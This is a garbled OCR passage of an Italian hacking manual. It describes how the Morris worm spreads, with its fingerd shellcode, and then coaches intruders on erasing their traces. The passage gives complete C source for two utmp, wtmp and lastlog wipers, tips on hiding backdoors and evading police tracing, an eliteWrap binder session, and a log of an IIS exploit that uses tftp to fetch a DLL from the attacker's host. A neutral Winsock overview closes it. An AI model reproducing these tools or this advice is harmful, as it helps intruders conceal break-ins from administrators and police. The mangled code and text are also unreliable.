if [-f sh]then P=x1 4481 910 
else P=sh 

fi 

Successivamente per ogni binario trasferito si manda la seguente sequenza di comandi: 

ce -o $P x1 4481 91 0, sun3.o ./$P -p $$ x1 4481 91 0,sun3.o x1 4481 91 0,vax.o x1 4481 910,11 .c 
rm -f $P 

Il comando rm viene eseguito solo se l'esecuzione del Worm fallisce; infatti se il Worm si 
accorge che l'host è giàinfettato la connessione viene chiusa, altrimenti se l'esecuzione 
fallisce vengono cercati tutti i file oggetto e cancellati in modo da non lasciare traccia 
dell'infezione. 

Descrizione dell'esecuzione del Worm 

1. Il nuovo Worm dopo aver infettato la macchina procede a nascondersi, uccidendo i 
processi parenti e cancellando dal disco ogni file binario appartenente al Worm 
stesso. 

2. Successivamente, il Worm cerca di raccogliere quante più informazioni possibili sulle 
interfaccie di rete sulle macchine connesse a quella infettata, e si costruisce cosi una 
lista in memoria sui nomi e gli alias di tali macchine. Queste informazioni vengono 
raccolte attraverso la chiamata ioctl () e con il programma netstat che viene eseguito 
con varie opzioni; inoltre altre informazioni sono reperibili guardando alcuni file di 
sistema riguardanti il networking. 
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3. Una volta costruita la lista in memoria di host vulnerabili, Il Worm cerca di creare una 
nuova lista con gli hosts effettivamente connessi alla rete, a seconda del tipo di hosts 
che poteva essere un gateway o un nodo di una L.A.N.; viene lanciato il comando 
telnet o rexec ports per determinare se l'host è effettivamente raggiungibile. 

4. L'infezione segue a questo punto 3 strade: rsh, fingered o sendmail. 

o Nell'attacco via rsh, il Worm attende che il sistema remoto restituisce una 
shell all'invocazione dei comandi /usr/ucb/rsh, /usr/bin/rsh, /bin/rsh.ll Worm 
procede poi a infettare la macchina partendo nuovamente dal passo 1 al 2. 

o L'Attacco al demone finger funzionava in questo modo: Dopo aver effettuato 
la connessione con il demone del finger gli veniva passata una stringa di 536 
byte, questa causa un overflow del buffer di input e una sovrascrittura dello 
stack. Per la versione 4BSD che andava su architettura VAX, l'overflow 
ritornava un puntatore al buffer dello stack. L'istruzione che veniva scritta 
nella parte dello stack era: 

o pushl 

o $68732f Ysh\0' pushl $6e69622f Ybin' movi sp, r1 0 pushl $0 pushl 

o $0 pushl r1 0 pushl $3 movi sp,ap chmk $3b 

Quando questa routine ritornava nel main veniva eseguita: execve(7bin/sh", 
0, 0) (una shell con i permessi di root), Sui sistemi VAX II Worm aveva cosi 
una remote shell connessa via TCP. Il Worm procedeva poi a infettare la 
macchina dal passo 1 al passo 2. 

o I Worm procede all'infezione dell'host remoto stabilendo una connessione 
SMTP e usando il metodo descritto precedentemente nella trattazione del 
bug di sendmail. Non venivano provate tutte le vie se non era necessario, ma 
per la prima che risultava di successo, l'host veniva marcato come infetto. 

5. Successivamente il Worm opera in 5 stati. Ogni stato è caratterizzato dall'esecuzione 
di un piccolo ciclo, ,poi il Worm torna al passo 8 in attesa di irrompere in un altro host 
tramite le tecniche sopra descritte(sendmail fingerd o rsh). Nei primi quattro stati il 
Worm cerca di procurarsi un account sulla macchina locale. Nel quinto stato il Worm 
cerca invece di infettare altri host che risultano raggiungibili dalla sua tabella in 
memoria costruita al passo precedente. I primi quattro stati consistono nelle seguenti 
operazioni: 

o II Worm legge i file /etc/hosts.equiv e /.rhosts e inserisce l'indirizzo degli host 
che trova nella sua tabella in memoria, successivamente viene letto il file 
/etc/passwd e inserito nella sua struttura interna , dopo aver fatto questo, 
viene esaminato il file .forward in ogni home directory e inclusi gli hosts name 
presenti in questo file nella tabella in memoria. 

o Successivamente il Worm aspetta che vengono crakkate le password che si 
era procurato, l'algoritmo di crakking è molto semplice e si basa sul fatto che 
la password è ricavata dallo stesso nome di Login dell'utente o da varie 
combinazione tra il suo nome cognome, combinazioni molto semplici e 
facilmente intuibili;esempio entry del file /etc/passwd: 

o Riccardo:akddfsafrewaf:100:5:user, Name:/usr/Riccardo:/bin/sh 



In ordine vediamo nome account, password crittata, user ID, group ID, 
informazioni utenti, pathname della home dell'utente e pathname della shell 
assegnata all'utente. 

o nel terzo stato le password che erano state crakkate vengono inserite in un 

dizionario di parole che viene successivamente utilizzato, 
o Nel quarto stato si entra se tutte le prove sono fallite. Ogni parola del 

dizionario viene confrontata con ogni account e inoltre se la parola nel 

dizionario è maiuscola viene convertita in minuscolo e riconfrontata con tutti 

gli account. 
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6. Una volta che sono state crakkate le password di ogni account, il Worm cerca negli 
hosts che si è ricavato, gli account di quella macchina in modo da poter entrarci 
attraverso due tipi di attacco: 

o II Worm cerca di lanciare una shell remota usando il comando rexec e le 
informazioni ricavate: nome account .foward .rhosts /etc/passwd, giocando 
sul fatto che gli utenti hanno password uguali su macchine differenti. 

o I Worm cerca di lanciare una shell remota rsh dall'account locale, 
considerando il fatto che se quell'account è inserito nel file .rhosts della 
macchina remota l'autenticazione avviene senza password; se la shell viene 
lanciata con successo l'infezione procede dal passo 1 . (non vengono usate 
altre password di utenti), il Worm si forka regolarmente uccidendo i processi 
parenti, questa cosa è fatta per due principali motivi. Il primo è che cosi 
facendo il processo associato al Worm cambia l'I D e il conteggio del tempo di 
CPU viene aggirato, e il secondo che viene azzerato il tempo di esecuzione 
del processo, due parametri che servono allo scheduler del sistema operativo 
per cambiare processo. 

Una volta che il Worm entrava in una macchina provava a vedere se erano in esecuzione altri 
Worm nel sistema, se il controllo era positivo allora il Worm usciva, tranne che una volta su 
sette per proteggersi nel tentativo che l'amministratore faceva eseguire un falso Worm in 
modo da confondere quello vero. Questa caratteristica del settimo Worm fu quella che portò 
alla scoperta dell'infezione visto che in poco tempo le macchine si "congelavano" non 
potendo più eseguire nessuna operazione. Morris fu scoperto quando uno dei suoi amici 
parlò con John Markoff, un giornalista esperto in computer del New York Times, e provò a 
convincere Markoff che l'incidente era involontario, il worm era inoffensivo e l'autore era 
dispiaciuto. L'amico, inavvertitamente, si lasciò sfuggire il login del provocatore del danno. 
Passare dal nome di login al nome del proprietario fu facile. Il giorno dopo la storia era in un 
articolo in prima pagina. Morris fu giudicato e condannato dalla corte federale al pagamento 
di una multa, a tre anni con la sospensione condizionale della pena e a numerose ore di 
lavoro in una comunità. 



Eliminazione delle tracce 

A questo punto ritorniamo giù dalla luna e guardiamo la realtà nella faccia. 

lo non posso sapere quali sono i vostri scopi nell'ambito dell'hacking anche se posso sperare 

che questi non abbiano finalità che vanno oltre a quelle che sono le pure motivazioni di 

studio. 

In ogni caso tra le tante attività legate all'hacking quella orientata all'eliminazione delle tracce 
è sicuramente quella più importante. 

Se non riusciste a introdurvi dentro ad un sistema, poco male: vi andrà meglio la prossima 
volta. 

Se invece riusciste ad introdurvi dentro ad un sistema ma se non riusciste ad eliminare le 
tracce del vostro passaggio, allora potrebbero essere guai e anche brutti. 
Vi avevo già detto all'inizio che in Italia l'inserimento abusivo dentro ad un sistema è passibile 
di brutti pasticci con la legge. 

Non che negli altri stati la questione si differente e ne sa qualche cosa Kevin che per ben 4 

anni ha usato le patrie galere americane senza spendere neppure una lira. 

In ogni caso se fare questo tipo di vacanza non è tra gli obbiettivi che vi ponete, prestate una 

buona parte di tempo a studiare i metodi che servono ad eliminare le tracce dei vostri 

passaggi. 

Ogni sistema operativo possiede i suoi file di LOG dentro ai quali potrebbero essere registrate 
tutte le attività svolte sul sistema a partire dal login. 

Oltre ai sistemi operativi si devono mettere in conto anche i vari servers i quali hanno sempre 
file di LOG dettagliati che permettono di sapere sempre quali operazioni sono state svolte. 
Prendiamo ad esempio dei MAILSERVER in ambiente Windows. 

Questo tipo di server gestisce operazioni legate a diversi protocollo come ad esempio quello 
SMTP, POP3 e IMAP. 

Un esempio di file di LOG relativo a SMTP è quello che segue: 
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57.235.72.25 [000009D4] Tue, 19 Mar 2002 00:03:32 +0100 «< MAIL From: 
<emailbargains887@yahoo . com> 

67.235.72.25 [000009D4] Tue, 1 9 Mar 2002 00:03:32 +01 00 »> 250 2.1 .0 
<emailbargains887@yahoo.com>... Sender ok 

67.235.72.25 [000009D4] Tue, 1 9 Mar 2002 00:03:34 +01 00 «< RCPT 
To:<excite.com@021 982> 

67.235.72.25 [000009D4] Tue, 19 Mar 2002 00:03:34 +0100 »> 550 5.7.1 
<excite . com@021982> . . . we do not relay <emailbargains887@yahoo . com> 
67 .235.72.25 [000009D4] Tue, 19 Mar 2002 00:03:37 +0100 «< RCPT 
To:<excite.com@0179>207 .21.239.85 [00000B20] Tue, 19 Mar 2002 03:06:57 +0100 
Connected 

207 .21.239.85 [00000B20] Tue, 19 Mar 2002 03:06:57 +0100 »> 220-mail . websitek . it 
ESMTP Merak 4.2.3; Tue, 19 Mar 2002 03:06:57 +0100 

207 .21.239.85 [00000B20] Tue, 19 Mar 2002 03:06:57 +0100 «< HELO 
lyrisOl . hosting. innerhost . com 

207 .21.239.85 [OOOOOB20] Tue, 19 Mar 2002 03:06:57 +0100 >» 250 mail.websitek.it 
Hello lyris01.hosting.innerhost.com [207.21.239.85], pleased to meet you. 
207 .21.239.85 [OOOOOB20] Tue, 19 Mar 2002 03:06:57 +0100 «< MAIL FROM : <bounce- 
aspngibuyspy—663531@aspfriends . com> 

207 .21.239.85 [OOOOOB20] Tue, 19 Mar 2002 03:06:57 +0100 >» 250 2.1.0 <bounce- 
aspngibuyspy—663531@aspfriends.com>... Sender ok 

207 .21.239.85 [00000B20] Tue, 19 Mar 2002 03:06:58 +0100 «< RCPT 
TO: <techinfo@websitek . com> 

207 .21.239.85 [00000B20] Tue, 19 Mar 2002 03:06:58 +0100 »> 250 2.1.5 
<techinfo@websitek.com>... Recipient ok 

207 .21.239.85 [00000B20] Tue, 19 Mar 2002 03:06:58 +0100 «< DATA 

207 .21.239.85 [OOOOOB20] Tue, 19 Mar 2002 03:06:58 +0100 >» 354 Enter mail, end 
with ". " on a line by itself 

207 .21.239.85 [00000B20] Tue, 19 Mar 2002 03:06:58 +0100 *** <bounce-aspngibuyspy- 
663531@aspfriends.com> <techinfo@websitek.com> 1 3130 00.00.00 OK 

207 .21.239.85 [OOOOOB20] Tue, 19 Mar 2002 03:06:59 +0100 >» 250 2.6.0 3130 bytes 
received in 00.00.00; Message accepted for delivery 

207 .21.239.85 [00000B20] Tue, 19 Mar 2002 03:06:59 +0100 «< RSET 

207 .21.239 .85 [OOOOOB20] Tue, 19 Mar 2002 03:06:59 +0100 »> 250 2.0.0 Reset state 

Come potete vedere dallo spezzone di file di LOG che segue, le operazioni fatte da un 
hacker, in questo caso legate all'uso di unicode bug, sono state registrate con tanto di IP. 

2001-12-13 06:44:43 217 . 57 . 79 . 187 - 217.57.163.98 80 GET 
/scripts/ . .%5c. . /winnt/system32/cmd.exe /c+tftp%20- 
i%20217. 57. 79. 187%20GET%20Admin.dll%20c: \Admin.dll 502 - 

2001-12-13 06:44:48 217 .57 .79.187 - 217.57.163.98 80 GET 
/scripts/ . .%5c. . /wlnnt/system32/cmd.exe /c+tftp%20- 
i%20217.57.79.187%20GET%20Admin.dll%20d:\Admin.dll 502 - 



2001-12-13 06:46:05 217 . 57 . 79 . 187 - 217.57.163.98 80 GET 
/scripts/ . .%5c. . /winnt/system32/cmd.exe /c+tftp%20- 
i%20217. 57. 79. 187%20GET%20Admin . dll%20e : \Admin.dll 502 - 



Non essendoci stata l'elimiazione delle tracce, in questo caso il pericolo di essere individuati 
diventa notevole. 

Ricordiamoci sempre che spesso l'individuazione di una backdoor o di un accesso abusivo 
creato su di un sistema remoto non corrisponde necessariamente all'immediata eliminazione. 
Se l'amministratore di sistema è furbo vi lascerà lavorare dopo aver fatto denuncia alle 
autorità competenti, qui in Italia la Polizia Postale, in modo che nel frattempo il vostro accesso 
venga tracciato ed identificato. 

Non tirate mai la corda oltre un certo limite e ricordatevi che la calma precede la bufera. 
Un esempio invece di file di LOG relativo al server POP3 è quello che segue : 



80.20.146 

80.20.146. 
Merak 4.2. 

80.20.146. 
80.20.146. 
80.20.146 
80.20.146 



10 [00000A88] Tue, 19 Mar 2002 00:00:00 +0100 Connected 

10 [00000A88] Tue, 19 Mar 2002 00:00:00 +0100 »> +OK mail.websitek.it 
3 POP3 Tue, 19 Mar 2002 00:00:00 +0100 <20020319000000@mail.websitek.it> 

10 [00000A88] Tue, 19 Mar 2002 00:00:00 +0100 «< USER vendite 

10 [00000A88] Tue, 19 Mar 2002 00:00:00 +0100 »> +OK vendite 

10 [00000A88] Tue, 19 Mar 2002 00:00:00 +0100 «< PASS ****** 

10 [00000A88] Tue, 19 Mar 2002 00:00:00 +0100 »> +OK 0 messages 0 octets 
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80.20.146.10 [00000A88] Tue, 19 Mar 2002 00:00:00 +0100 «< STAT 

80.20.146.10 [00000A88] Tue, 19 Mar 2002 00:00:00 +0100 >» +0K 0 0 

80.20.146.10 [00000A88] Tue, 19 Mar 2002 00:00:00 +0100 «< QUIT 

80.20.146.10 [00000A88] Tue, 19 Mar 2002 00:00:00 +0100 »> +0K mail.websltek.it 



Come potrete vedere da questi files è possibile avere moltissime informazioni, tra cui quella 
più importante relativa all' IP. 

Gli hacker spesso utilizzano quelli che vengono definiti con il termine di cloating software per 

coprire le loro tracce. 

Il seguente file si chiama cloaker.c 

^include <fcntl.h> 

# include <utmp . h> 

iinclude <sys/types.h> 

^include <unistd. h> 

iinclude <lastlog.h> 

main (argc, argv) 
int argc; 
char *argv[]; 



{ 



char *name; 
struct utmp u; 
struct lastlog 1; 
int fd; 
int i = 0; 

int done = 0; 

int size; 

if (argc != 1) { 

if (argc >= 1 && strcmp (argv [1] , "cloakme") == 0) { 
printf ("You are now cloaked\n") ; 
goto start; 



} 



else { 

printf ( "dose successful \n ") ; 

exit (0) ; 

ì 

} 

else { 

printf ("usage: dose [file to dose] \n") ; 

exit(l); 

} 

start : 

name = (char *) (ttyname (0) +5) ; 
size = sizeof (struct utmp) ; 

fd = open("/etc/utmp", 0_RDWR) ; 
if (fd < 0) 

perror ( "/etc/utmp ") ; 
else ( 

while ( (read(fd, &u, size) == size) && ìdone) { 
if (! strcmp (u . ut_line, name)) { 
done = 1; 

memset(&u, 0, size); 

lseek (fd, -1 *size, SEEK_CUR) ; 

write (fd, &u, size) ; 

dose (fd) ; 

} 

) 

} 



size = sizeof (struct lastlog) ; 

fd = open (" /var/adm/ lastlog" , 0_RDWR) ; 
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else { 

lseek (fd, size*getuid () , SEEK_SET) ; 
read(fd, &1, size) ; 
l.ll_t±me = 0; 

strncpy(l.ll_line, "ttyq2 ", 5); 
getho striarne (l.ll_host, 16); 
lseek (fd, slze*getuld () , SEEK_SET) ; 
dose (fd) ; 

} 



Un altro sorgente che possiede come scopo quello della manipolazione dei file di log in 
ambiente UNIX è il seguente. 

/* 

REMOVE — February 26, 1997 

Sinopie Nomad — Nomad Mobile Research Centre 

Universal utmp, wtmp, and lastlog editor. Actually 
removes, doesn 't leave holes . . . 

Compile "ce -o remove remove. c -DGENERIC" and run 
as root . Use -DAIX instead of -DGENERIC for an AIX 
machine. Use -DSCO instead of -DGENERIC for a SCO 
machine . 
*/ 

iinclude <stdio.h> 
^include <utmp . h> 
^include <sys/types . h> 
^include <unistd. h> 
^include <fcntl.h> 
tiifndef AIX 
^include <lastlog.h> 
#else 

^include <login.h> 
Itendif 

^include <pwd.h> 
tiifdef AIX 

#define WTMP "/var/adm/wtmp " 
idefine UTMP "/etc/utmp" 

#define LASTLOG "/etc/security/lastlog" /* Not a binary file in AIX, so */ 
/* handled a bit differently. */ 
char LogParam [7] [30]= 
{ 

"time_last_login=" , "tty_last_login=" , "host_last_login=" , 
"unsuccessful_login_count=", "time_last_unsuccessful_login=", 
"tty_last_unsuccessful_login=" , "host_last_unsuccessful_login=" 

}; 

iendif 
Itifdef SCO 

#define WTMP "/etc/wtmp" /* wtmp was here on the SCO box I accessed */ 
#define UTMP "/var/adm/utmp" 
idefine LASTLOG " /var/adm/ 'lastlog" 
iendif 

#ifdef GENERIC /* Should work with Linux, IRIX, Digital Unix, BSDs, etc */ 

idefine WTMP "/var/adm/wtmp" 

idefine UTMP "/var/adm/utmp" 

idefine LASTLOG " /var/adm/ lastlog" 

iendif 

void main (arge, argv) 
int arge; 
char *argv[ ] ; 
{ 

int cleanWtmp (char * , int) ; 
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int cleanUtmp (char * , int) ; 
int cleanLast log (char *) ; 
int getCount (char * , char *) ; 
char line [10] ; 
int killem, firstcnt, t; 

if (argc!=2) 
{ 

printf ("Usage: %s acct\n" , argv[0] ) ; 
exit (0) ; 

} 

firstcnt=getCount (WTMP, argv[l] ) ; /* Get an initial count */ 
printf ("\nREMOVE by Simple Nomad\nNomad Mobile Research Centre (c) 
1997\n\n"); 

printf ("Found %d record (s) for user %s\n" , firstcnt, argv [1] ) ; 
printf ("Will attempt a lastlog cleanup by de fault . \n\n") ; 
printf ("# - remove last # records front utmp/wtmp\n" ) ; 
printf ("a - remove (a) 11 records from utmp/wtmp\n") ; 
printf ("q - (q)uit program\n\n" ) ; 
printf ( "Enter selection -> ") ; 
gets (line) ; 

if (line [0] ==0x51 II line [0] ==0x71) exit (0) ; 

if (line [0] ==0x41 II line [0] ==0x61) killem= firstcnt; 

else killem=atoi (line) ; 

if (killem> firstcnt) 

{ 

printf ("You cannot delete %d records if only %d 
exist . \n ", killem, firstcnt) ; 
exit (-1) ; 

} 

t=cleanWtmp (argv [1] , killem) ; /* Now to clean up utmp and wtmp */ 
if (t==l) { 

printf ("Trouble cleaning up %s . \n" , WTMP) ; 

exit (-1) ; 

} else printf ( "REMOVE cleaned up %d record (s) from %s\n" , killem, WTMP) ; 
t=cleanUtmp (argv[l ] , killem) ; 
if (t==l) { 

printf ("Trouble cleaning up %s . \n" , UTMP) ; 

exit (-1) ; 

} else printf ( "REMOVE cleaned up %d record (s) from %s\n" , killem, UTMP) ; 
t=cleanLastlog (argv [1] ) ; /* Make our attempt at lastlog */ 
if (t==l) { 

printf ("Trouble cleaning up %s . \n" , LASTLOG) ; exit(-l); 

} 

printf ("REMOVE cleaned up %s\n" , LASTLOG) ; 
} /* end main */ 

int getCount (fname, acct) /* Go check wtmp and find out how many records */ 

char * fname, *acct; 

{ 

struct utmp utmp_ent; 
int f, cnt=0; 

if ( (f=open (fname, O RDWR) ) >=0) { 

while (read (f, &utmp_ent , sizeof (utmp_ent) ) ) if ( ! strncmp (utmp_ent . ut_name, 
acct, strlen (acct) ) ) cnt++; 
} 

dose (f) ; 
return (cnt) ; 
} /* end getCount */ 

int cleanWtmp (acct, killem) 
char *acct; 
int killem; 
{ 

struct utmp utmp_ent; 
int fd, count=0; 

if ( (fd=open (WTMP, 0_RDWR) ) >=0) { 



Copyright 2002 Flavio Bernardotti - Tel. (39) 380 7097051 



Hacker Programming Book 



whlle (read (fd, &utmp_ent , slzeof (utmp_ent ) ) ) if ( ! strncmp (utmp_ent . ut_name, acct, 
strlen (acct) ) ) count++; 

lseek (fd, 0, SEEK_SET) ; 

whlle (read (fd, &utmp_ent, slzeof (utmp_ent) ) &&killem) { 
If ( ! strncmp (utmp_ent . ut_name, acct, strlen (acct) ) ) { 
count — ; 

If (count+l<=killem) { 

bzero ( (char *) &utmp_ent , slzeof (utmp_ent) ) ; 
lseek (fd, - (slzeof (utmp_ent) ) , SEEK_CUR) ; 
wrlte (fd, &utmp_ent , slzeof (utmp_ent) ) ; 
klllem — ; 

} 

} 

} 

dose (fd) ; 

} 

else return (1) ; 
} /* end cleanWtmp */ 

Int cleanUtmp (acct, klllem) 
char *acct; 
int klllem; 
{ 

struct utmp utmp_ent; 
Int fd; 

lf((fd=open (UTMP, 0_RDWR) ) >=0) { 
lseek (fd, 0, SEEK_SET) ; 

whlle (read(fd, &utmp_ent , slzeof (utmp_ent) ) &&klllem) { 
If ( ! strncmp (utmp_ent . ut_name, acct, strlen (acct) ) ) { 
lf(killem>0) { 

bzero ( (char *) &utmp_ent , slzeof (utmp_ent) ) ; 
lseek (fd, - (slzeof (utmp_ent) ) , SEEK_CUR) ; 
wrlte (fd, &utmp_ent , slzeof (utmp_ent) ) ; 
klllem — ; 

; 

; 

dose (fd) ; 

} 

else return (1); 
} /* end cleanUtmp */ 

Int cleanLast log (acct) /* The lastlog subroutine */ 

char *acct; 

{ 

iifdef AIX /* Quite a kludge for AIX, but what the fuck it works */ 
int t,i; 

char entry [200] ; 
for (1=0; i<7; 1++) 
{ 

sprintf (entry, "chsec -f %s -s %s -a 
%s>/dev/null ", LASTLOG, acct , LogParam [1] ) ; 
t=system (entry) ; 

printf ("Return code for %s is %d\n" , LogParam[i] , t) ; 

} 

#else /* Normal binary lastlog cleanup */ 
struct passwd *pwd; 
struct lastlog logit; 
int f; 

if ( (pwd=getpwnam (acct) ) ) { 

if ( (f=open (LASTLOG, 0_RDWR) ) >=0) { 

lseek (f, (long) pwd->pw_uid* slzeof (struct lastlog) , 0) ; 
bzero ( (char *) ilogit, slzeof (logit) ) ; 
wrlte (f, (char *) ilogit, slzeof (logit) ) ; 
dose (f) ; 

} 
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else return (1) ; 




Il discorso legato alle traccie che potrebbero essere lasciate su di un sistema possono essere 
viste da due punti di vista. 

Il tutto potrebbe essere paragonato a quello della vita reale a casa propria. 
Nell'abitazione in cui uno vive potrebbe da una parte fare attenzione a non sporcare, o 
addirittura prendere precauzioni per non farlo, e dall'altra parte pulire quello che si è sporcato. 
Questo discorso implica altre cose come ad esempio le intenzioni che si hanno nei confronti 
dei sistemi presi di mira. 

L'hacker potrebbe accedere al sistema e terminare li la propria esperienza con il sistema 
oppure potrebbe preventivare di usare questo per altre attività. 

Se il caso reale è il primo allora l'unica precauzione da prendere sarà quella di non lasciare 
tracce che possano permettere di risalire a voi. 

Se il caso invece fosse il secondo allora dovrete anche preoccuparvi di nascondere le 
backdoor in modo tale che un eventuale analisi non metta alla luce il vostro accesso. 
Ricordatevi sempre quello che segue. 

Spesso l'hacker utilizza connessioni tramite gestori quali TISCALI, TIN o simili i quali 
assegnano un IP in modo dinamico per cui all'interno dei loro log ci sarà semplicemente che 
un utente ha avuto dall'ora all'ora l'ip xxx.xxx.xxx.xxx. 

Anni fa sarebbe stato impossibile abbinare l'assegnazione dell'IP ad un numero telefonico. 

A giorno d'oggi con il discorso delle centrali telefoniche digitali bisogna prestare maggiore 

attenzione. in quanto queste possono anche inviare il numero di telefono come nel caso dei 

cellulari per cui con sistemi telefonici d'avanguardia potrebbero al limite avere anche un 

tracciamento che permette di abbinare il numero di telefono all'IP abbinato. 

Vi dico chiaramente che non sono sicuro di questo ma in ogni caso vi invito a prestare 

attenzione in quanto al limite potrebbe esserci anche questo pericolo. 

In ogni caso un accusa precisa potrebbe esserci nell'istante in cui il vostro telefono viene 

tenuto sotto controllo. 

Questo per dire che non è detto che l'amministratore di sistema una volta identificata la vostra 
backdoor la elimini mettendovi sull'avvisaglia del fatto che siete stati scoperti. 
L'amministratore potrebbe, anche su consiglio della polizia, tenere il sistema sotto controllo 
per cui è un fatto essenziale cercare di limitare i fatti che potrebbero portare alla vostra 
individuazione. 

Per prima cosa fate attenzione ad una cosa. 

Molte linee di trasmissione dati offerte alle società da Interbusiness o airi gestori posseggono 
un tariffazione a traffico per cui potrebbe esserci la possibilità che l'amministratore di sistema 
controlli spesso la quantità di bytes movimentati. 

Questo significa che dovreste cercare di limitare il numero di bytes trasferiti. 
Cosa significa questo ? 

In alcune consulenza da me tenute alcuni hackers, dopo essere entrati in sistemi privati, 
hanno inserito dei giochi e successivamente hanno pubblicizzato l'IP di questi servers sulla 
rete facendo in modo che altri utenti della rete si collegassero per prelevare questi softwares 
creando in questo modo un flusso di dati elevato. 

Inoltre i softwares usati come backdoor potrebbero essere identificati con delle semplicissime 
funzioni del tipo CERCA. 

Ad esempio una backdoor era quella chiamata ROOT.EXE. 

Esistono alcuni softwares che permettono di inserire i programmi di gestione delle backdoor 
all'interno di altri programmi rendendoli in questo modo invisibili all'interno del sistema. 
Uno di questi programmi si chiama ELITEWRAP. 

Il pacchetto è in grado di inserire un software all'interno di un altro o anche molti files dentro 
ad uno solo utilizzando un certo numero di opzioni. 



eLiTeWrap 1.04 - (C) Tom "eLiTe" Mclntyre 
tom@holodeck . f9 . co . uJfc 

http : //www . holodeck . f9. co. uk/elitewrap 
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That file already exists! Overwrite? [y/N] 


•' y 


Perforiti CRC-32 checking? [y/n] : y 






Operations : 1 - Pack only 






2 - Pack and execute, 


visible, 


asyn chronously 


3 - Pack and execute, 


hidden, 


asynchronously 


4 - Pack and execute, 


visible, 


syn chron ously 


5 - Pack and execute, 


hidden, 


syn chron ously 


6 - Execute only, 


visible, 


asynchronously 


7 - Execute only, 


hidden, 


asynchronously 


8 - Execute only, 


visible, 


syn chron ously 


9 - Execute only, 


hidden, 


syn chron ously 


Enter package file #1; buffer.exe 







Il programma è prelevabile da : 
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Parte VII 



Le librerie di programmazione in C per la rete 
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W insock e Socket 

In questo volume vengono trattate alcune librerie che permettono la manipolazione di 
pacchetti tra cui la trasmissione e la ricezione mediante diversi protocolli. 
Alcune di queste librerie provengono dal sistema operativo Unix mentre altre sono relative a 
Windows od in ogni caso sono state portate in tale ambiente mediante l'utilizzo delle funzioni 
di base appartenenti alla libreria Socket. 

Windows Sockets (abbreviazione di "Winsock" o "WinSock") specificano un interfaccia per la 
programmazione di rete in ambiente Microsoft Windows basate sul paradigma dei "socket" 
rese popolari negli ambienti BSD Unix . 

In ambiente Windows è possibile trovare due versioni di socket e precisamente : 

1. Le applicazioni Winsock 1 possono richiedere la notificazione degli eventi tramite il 
sistema di messaggio di Windows. Questo permette ai vostri programmi di gestire l'input 
sulla Ul e i lavori in background senza doversi preoccupare di gestire direttamente la 
concorrenza. 

2. Winsock 2 aggiunge allo standard 1 molte potenzialità. Winsock 2.x definisce due 
interfaccie : una 'application programming interface' (API) la quale esenta al 
programmatore di gestire gli strati a basso livello, e una 'service provider interface' (SPI) 
la quale gestisce un estensione del Winsock stack. Attraverso un adeguato uso delle 
API, le applicazioni Winsock possono lavorare su diversi protocolli di trasporto di rete e 
su implementazioni Winsock. 

La differenza tra il protocollo TCP e Winsock è che il primo è un protocollo di rete il quale 
funziona attraverso lo strato 3 e 4 del modello OSI. 

Un protocollo di rete fornisce servizi del tipo dell'indirizzamento, del trasporto dei dati, 

dell'instradamento e della gestione delle connessioni logiche sulla rete. 

Due computer devono usare gli stessi protocolli per riuscire a comunicare. 

Winsock invece non è un protocollo ma una raccolta di funzioni (API) che permettono a 

W9indows di inviare dati utilizzando diversi protocolli di comunicazione. 

Esistono molte funzioni all'interno di Winsock che funzionano soltanto con TCP/IP come ad 

esempio gethostbyaddr() ma esistono anche nuove versioni generiche di queste in Winsock 

2 che permettono di usare altri mezzi di trasporto. 

Leggendo prima qualche d'uno si sarà chiesto sul come mai sono state trattate diverse 
librerie. 

La risposta è semplice. 

Winsock riesce ad utilizzare soltanto certi livelli del sistema di comunicazione e quindi non 
permette il capture dei pacchetti in modalità promiscua. 

Per riuscire a prendere dati in modalità RAW è necessario bypassare Winsock e parlare 
direttamente al Transport Data Interface (TDI) oppure allo strato Network Device Interface 
Specification (NDIS). 

Il livello TDI è appena sopra allo strato NDIS (network driver). 

Ad esempio con Winsock è praticamente impossibile scrivere pacchetti di sniffing per i quali 
sono necessari pacchetti di libreria come ad esempio WINDUMP che abbiamo visto 
nell'apposito capitolo. 

Alcune limitazioni legate alla manipolazione dei pacchetti però può essere eseguita anche 
tramite Winsock 2 ma soltanto in ambiente WINDOWS 2000 o simili. 
Stimo parlando della manipolazione dell'header dei pacchetti. 

Tramite le funzioni setsockopt() e ioctlsocket() è possibile settare alcuni campi dentro a questi 
header. 

In ogni caso anche queste funzioni sarebbe il caso di eseguirle tramite le altre librerie viste. 
Ripeto che algoritmicamente l'uso delle funzioni socket è semplice in quanto generalmente 
richiedono pochissime funzioni. 

Allo stesso tempo le informazioni ottenibili con le sockets possono essere importantissime ijn 
quanto non dimentichiamoci che queste funzioni devono possedere tutte le caratteristiche dei 
protocolli usati nell'ambito di un netowork. 

La gestione degli errori viene eseguita tramite la funzione WSAGetLastErrorQ 
Un esempio di utilizzo della funzione per la gestione errori è : 
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r = recv (...); 

if (r == -1 /* (but see below) */ 

&& WSAGetLastError () == EWOULDBLOCK) 
{...} 

Le funzioni in genere restituiscono dei valori i quali possono essere testati per capire se sono 
andate a buon fine. 




oppure 

r = recv (...); 

if (r == SOCKE T_ERROR 

&& WSAGetLastErrorO == WSAEWOULDBLOCK) 

Nell'ambito di socket 2 esistono alcune funzioni che derivano dal sistema operativo BSD ed 
altre invece che sono specifiche di Microsoft. 
Gli elenchi delle prime e delle seconde sono. 



accept() * 
bind() 

closesocket() * 



connect() * 
getpeername() 
getsocknameO 
getsockopt() 
htonl() °° 
htons() °° 
inet_addr() °° 

inet_ntoa() °° 
ioctlsocket() 
listen() 
ntohl() °° 
ntohs() °° 
recv() * 
recvfrom() * 
select() * 
send() * 
sendto() * 
setsockopt() 
shutdown() 
socket() 



Una connessione in ingresso viene riconosciuta e associata con un socket 

creato sull'istante. Il socket originale ritorna nello stato di attesa 

Assegna un nome ad un socket locale senza nome. 

Rimuove un socket dalla tabella di riferimento degli oggetti per-process. 

Soltanto i blocchi SOJJNGER sono settati a un timeout diverso da zero 

su un socket bloccante. 

Inizializza la comunicazione su un socket. 

Recupera il nome del peer connesso ad un socket. 

Recupera l'indirizzo locale al quale il socket specificato è legato. 

Recupera le opzioni relative al socket. 

Converte un vaore a 32-bit da host byte order a network byte order. 
Converte un vaore a 1 6-bit da host byte order a network byte order. 
Converte una sringa di caratteri rappresentante un numero nella notazione 
standard di internet con tanto di "." 

Converte un indirizzo internet in una stringa ASCII nel formato "a.b.c.d". 
Fornisce il controllo per ilo socket. 

Rimane in ascolto di una connessione in ingresso sul socket specificato. 
Converte un numero a 32-bit da network byte order a host byte order. 
Converte un numero a 1 6-bit da network byte order a host byte order. 
Riceve dei dati da un socket connesso o non connesso. 
Riceve dati da uno dei due socket connesso e non connesso. 
